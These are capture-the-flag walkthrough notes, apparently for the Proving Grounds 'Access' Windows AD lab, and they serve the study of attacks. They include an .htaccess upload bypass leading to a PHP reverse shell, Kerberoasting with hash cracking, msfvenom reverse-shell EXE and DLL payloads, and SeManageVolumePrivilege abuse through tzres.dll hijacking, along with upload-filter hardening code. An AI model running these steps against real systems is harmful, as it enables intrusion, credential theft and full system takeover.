WDavid404 / PG-Box

PG box walkthrough note

Access (Intermediate, Windows AD, 2022) ★ -- .htaccess, Invoke-RunasCs, SeManageVolumePrivilege #56

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

The community has rated it ‘Very Hard’.

Keypoints:

WDavid404 commented 1 month ago
PORT      STATE SERVICE           REASON          VERSION
53/tcp    open  domain            syn-ack ttl 125 Simple DNS Plus
80/tcp    open  http              syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
88/tcp    open  kerberos-sec?     syn-ack ttl 125
135/tcp   open  msrpc             syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 125
464/tcp   open  kpasswd5?         syn-ack ttl 125
593/tcp   open  ncacn_http        syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 125
3268/tcp  open  ldap              syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 125
5985/tcp  open  http              syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf            syn-ack ttl 125 .NET Message Framing
49666/tcp open  unknown           syn-ack ttl 125
49668/tcp open  unknown           syn-ack ttl 125
49673/tcp open  ncacn_http        syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  unknown           syn-ack ttl 125
49677/tcp open  unknown           syn-ack ttl 125
49704/tcp open  unknown           syn-ack ttl 125
49795/tcp open  unknown           syn-ack ttl 125

53/tcp

dig axfr @192.168.211.187   # no zone name given: the reply below is the root-zone NS list, not a transfer of access.offsec -->

; <<>> DiG 9.19.21-1+b1-Debian <<>> axfr @192.168.211.187
; (1 server found)
;; global options: +cmd
.                       85731   IN      NS      h.root-servers.net.
.                       85731   IN      NS      d.root-servers.net.
.                       85731   IN      NS      a.root-servers.net.
.                       85731   IN      NS      l.root-servers.net.
.                       85731   IN      NS      g.root-servers.net.
.                       85731   IN      NS      c.root-servers.net.
.                       85731   IN      NS      i.root-servers.net.
.                       85731   IN      NS      e.root-servers.net.
.                       85731   IN      NS      j.root-servers.net.
.                       85731   IN      NS      m.root-servers.net.
.                       85731   IN      NS      k.root-servers.net.
.                       85731   IN      NS      b.root-servers.net.
.                       85731   IN      NS      f.root-servers.net.
h.root-servers.net.     86399   IN      A       198.97.190.53
f.root-servers.net.     85731   IN      A       192.5.5.241
;; Query time: 96 msec
;; SERVER: 192.168.211.187#53(192.168.211.187) (UDP)
;; WHEN: Wed Aug 07 20:47:57 EDT 2024
;; MSG SIZE  rcvd: 284

139/tcp

no info

389/tcp

ldapsearch -H ldap://192.168.211.187 -x -s base namingcontexts -->

dn:
namingcontexts: DC=access,DC=offsec
namingcontexts: CN=Configuration,DC=access,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=access,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=access,DC=offsec

ldapsearch -H ldap://192.168.211.187 -x -b "DC=access,DC=offsec"

80/tcp

Page source code --> TheEvent - v4.6.0

ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.221.187/FUZZ --> no info

Click the "Send Message" button.

Buy ticket --> try uploading a PHP file.

Uploading a file with a .php.gif extension works and the file shows up under /uploads/, but we cannot execute it.

After some tries, I found that apart from known script extensions like ".php" and ".php4", I was able to upload files with my own extension such as ".xxx". But the server didn't execute the shell for the unknown extension; it just printed out the source code.

Solution: the server is Apache, so we can upload a ".htaccess" file to the directory to make the server treat the ".xxx" extension as a PHP script. Refer to video (https://www.youtube.com/watch?v=xZd1JWmLGLk).

echo "AddType application/x-httpd-php .xxx" > .htaccess

Upload the .htaccess file. Change the reverse shell PHP (Ivan Sincek) from .php to .xxx and upload it. Access the .xxx file under /uploads/ --> got a reverse shell.
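As an added illustration (Python written for this note, not code from the original comments or from the TheEvent template), the following models the blacklist-style upload filter that evidently let .xxx and .htaccess through on this box, beside an allowlist filter that would have stopped both, plus a small model of how the dropped .htaccess changes what Apache executes and why AllowOverride decides whether the trick works. The blacklist contents, the image allowlist and all function names are assumptions; the exact filter the site used is not known.

```python
"""Upload-filter model for the .htaccess trick described in the notes above.

Added example, not code from the original notes or from the TheEvent template.
The blacklist, the image allowlist and all function names are assumptions chosen
to reproduce the behaviour observed on the box: .php rejected, .xxx and .htaccess accepted.
"""
import os

# Assumed blacklist of the kind that let .xxx and .htaccess through.
BLOCKED_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Hardened replacement: allowed extensions paired with the magic bytes each must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def blacklist_filter(filename: str) -> bool:
    """Vulnerable: only known script extensions are refused, everything else is stored."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED_EXTS


def allowlist_filter(filename: str, content: bytes) -> bool:
    """Hardened: exactly one allowed extension, no dotfiles (.htaccess), no double
    extensions (shell.php.gif), and the content must carry the matching magic bytes."""
    base = os.path.basename(filename)
    if base.startswith("."):
        return False
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES or "." in stem:
        return False
    return content.startswith(ALLOWED_TYPES[ext])


def htaccess_payload(ext: str) -> str:
    """The one-line .htaccess from the notes: have Apache run files with <ext> as PHP."""
    if not ext.startswith("."):
        ext = "." + ext
    return f"AddType application/x-httpd-php {ext}\n"


def php_handled_exts(htaccess_text: str) -> set[str]:
    """Extensions that an uploaded .htaccess maps to PHP via AddType or AddHandler."""
    exts: set[str] = set()
    for line in htaccess_text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0] in ("AddType", "AddHandler") and "php" in fields[1].lower():
            exts.update(f.lower() for f in fields[2:])
    return exts


def executes_as_php(filename: str, htaccess_text: str, allow_override: bool) -> bool:
    """Rough model of mod_mime: .php is PHP by server config; anything the directory's
    .htaccess adds only counts when AllowOverride permits FileInfo directives."""
    ext = os.path.splitext(filename)[1].lower()
    if ext == ".php":
        return True
    return allow_override and ext in php_handled_exts(htaccess_text)


if __name__ == "__main__":
    payload = htaccess_payload("xxx")
    for name in ("shell.php", "shell.xxx", ".htaccess", "shell.php.gif"):
        print(f"{name:14} blacklist_accepts={blacklist_filter(name)!s:5} "
              f"runs_as_php={executes_as_php(name, payload, allow_override=True)}")
```

The server-side fix that does not depend on the upload filter at all is `AllowOverride None` (or at least an AllowOverride list without FileInfo) on the upload directory: AddType and AddHandler are FileInfo directives, so a dropped .htaccess is then ignored and the .xxx file keeps being served as text.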

WDavid404 commented 1 month ago

PE

It's an Active Directory machine, so we could look for some AD credentials... or we could make some.

We will start by getting a Service Principal Name. Use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)

Now that we have the SPN, we can request a ticket and store it in memory, with the end goal of getting its hash. To request the ticket, two commands are executed to request and store the ticket in memory.

Add-Type -AssemblyName System.IdentityModel   # load the .NET Kerberos token classes
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'   # request a TGS for the SPN; it lands in the session's ticket cache

Extracting the hash can also be done with a handy PowerShell Empire script that engages Kerberos.

[kali] wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ascii hashes.txt

Crack the hash:

hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt --> trustno1

(screenshots) --> didn't work

We should use the RunasCs script: https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1 (RunasCs is a utility to run specific processes with different permissions than the user's current logon provides, using explicit credentials.)

Import-Module ./Invoke-RunasCs.ps1 first. Try it:

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"

[kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=445 -f exe > shell.exe
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:/users/public/shell.exe"

Use this tool (SeManageVolumeExploit.exe) for SeManageVolumePrivilege.

Now we can write to the C: drive.

The general idea is that the attacker can leverage this privilege with the exploit to get full control over "C:\", then craft a ".dll" file and place it somewhere under "C:\Windows\System32\" to trigger the payload as root.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll

Place the DLL at C:\Windows\System32\wbem\tzres.dll and then run the systeminfo command.

--> we get a reverse shell.